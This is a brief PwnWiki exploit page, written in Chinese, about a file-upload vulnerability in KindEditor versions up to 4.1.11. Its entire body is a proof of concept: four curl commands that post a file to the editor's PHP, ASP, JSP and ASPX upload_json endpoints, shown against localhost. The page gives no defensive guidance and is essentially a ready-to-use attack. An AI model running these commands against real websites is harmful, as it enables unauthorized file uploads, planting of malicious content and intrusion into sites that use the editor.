Kindeditor 上傳漏洞
From PwnWiki
漏洞影響
kindeditor <= 4.1.11
POC
curl -F"[email protected]" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file curl -F"[email protected]" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file curl -F"[email protected]" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file curl -F"[email protected]" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file